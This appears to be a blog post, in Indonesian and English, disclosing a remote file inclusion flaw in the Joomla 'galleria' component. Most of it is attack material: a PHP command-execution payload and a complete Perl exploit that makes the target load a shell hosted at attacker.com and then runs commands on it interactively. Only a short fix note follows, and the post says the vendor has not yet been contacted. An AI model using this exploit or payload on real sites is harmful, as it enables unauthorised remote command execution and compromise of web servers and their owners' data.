LaGiPusHinGWitH ---- IT

Navigation

Home |

Categories

• Computer Hacking
• Computer Diary
• Computer DataBase
• Computer Propaganda
• Computer Prophile
• Computer Security
• Computer Unix

Monthly Archives

• September 2010
• October 2009
• December 2008
• November 2008
• October 2008
• September 2008
• July 2008
• May 2008
• March 2008
• December 2007
• October 2007
• September 2007
• August 2007

Most recent entries

• Create Oracle Tablespace on SAP with BRTools
• Audit on Oracle Database
• Membuat Oracle Data Guard
• Cerita Tentang Kamu
• Membuat ulang/re-create controlfile di oracle
• Membuat RMAN dengan crontab
• Saat kau hadir kembali
• Memindahkan controlfile dan redologfile pada Oracle
• Oracle Dataguard on Standart Edition
• Adakah aku dihatimu
• Instalasi 10g di HP-UX Itanium
• Instalasi OpenOffice di Slackware 12
• Syncronize archive log
• Merubah ukuran archived Log
• Alter Block Size for tablespace

Syndicate

• RSS 2.0
• Atom

Site Credits

Powered by:
ExpressionEngine

Design by:
BlogMoxie

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Joomla is free software, written in PHP Script released under GNU GPL Licence

##########################################
# galleria - A Picture Gallery #
# Copyright (C) 2004 #
# Homepage : http://www.binarydigit.at #
# Email : office@binarydigit.at #
# Version : 1.0 #
# License : GNU GPL Public License #
##########################################

-------------------------------------------------------

Vulnerability terjadi pada modules gallery

Proof of Concept:
~~~~~~~~~~~~~~~
Vulnerable Script: galleria.php pada folder modules/galleria.

---------------galleria.php--------------------------------

include_once($mosConfig_absolute_path."/components/com_galleria/
galleria.html.php");
include_once($mosConfig_absolute_path."/components/com_galleria/
config.galleria.php");
include_once($mosConfig_absolute_path."/administrator/components/
com_galleria/class.galleria.php");

html_galleria::show_header( $option, $Itemid );

switch( $task )
{
case ‘show_rubriks’:
show_rubriks ( $option, $Itemid );
break;

...
---------------------------------------------------------

Variabel $mosConfig_absolute_path tidak disanitasi .
Saat register_globals=on dan allow_fopenurl=on maka penyerang dapat meng-exploitasi kelemahan
ini dengan php injection script.

Poc/Exploit:
~~~~~~~~~~~

dir.txt
<?
echo "".passthru(' ls -la ; id ')."";
?>

Perl Exploit:
~~~~~~~~~~~

#!/usr/bin/perl
##
# Joomla Remote Code Execution Exploit
# Bug Found & code By roninmorgue
# code reference from K-159 & uid0/zod at ExploiterCode.com
##
# usage:
# perl joomla.pl <target> <cmd shell location> <cmd shell variable>
# perl joomla http://target.com/ http://attacker.com/cmd.txt cmd
# cmd shell example: <?passthru($_GET[cmd]);?>
# cmd shell variable: ($_GET[cmd]);
##
# Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org
##

use LWP::UserAgent;

$Directory = $ARGV[0];
$DirectoryCommand = $ARGV[1];
$command = $ARGV[2];

if($Directory!~/http:\/\// || $DirectoryCommand!~/http:\/\// || !$command){usage()}

head();

while()
{
print “[shell] \$”;
while(<STDIN>)
{
$cmdshell=$_;
chomp($cmdshell);

$exploit = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET=>$Directory.’/components/com_galleria/
galleria.php?mosConfig_absolute_path=
‘.$DirectoryCommand.’?&’.$command.’=’.$cmdshell)
or die “\nCould Not connect\n”;

$res = $exploit->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmdshell) {print “\nPlease Enter a Command\n\n”; $return ="”;}

elsif ($return =~/failed to open stream: HTTP request failed!/ ||
$return =~/: Cannot execute a blank command in <b>/)
{print “\nCould Not Connect to cmd Host or Invalid Command Variable\n”;exit}
elsif ($return =~/^<br.\>.<b>Fatal.error/) {print “\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[ê]/[\n]/;
print “\r\n$finreturn\n\r”;
last;
}
else {print “[shell] \$”;}}}last;
sub head()
{
print “\n===================================================\r\n”;
print “ *Joomla Remote File Inclusion*\r\n”;
print “=====================================================\r\n”;
}
sub usage()
{
head();
print “ Usage: perl joomla.pl <target> <cmd shell location> <cmd shell variable>\r\n\n”;
print “ <Site> - Full path to Joomla site ex: http://www.site.com/ \r\n”;
print “ <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n”;
print “ <cmd variable> - Command variable used in php shell \r\n”;
print “=====================================================\r\n”;
print “ Bug Found by roninmorgue \r\n”;
print “ Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org \r\n”;
print “=====================================================\r\n”;
exit();
}

``````````````````````````````````
Solution/The Fix:
~~~~~~~~~~~~~~

Non-aktifkan module galleria/delete
Sanitasi script pada file galleria.php untuk mencegah vulnerability ini

Notification:
~~~~~~~~~~~

vendor belum dihubungi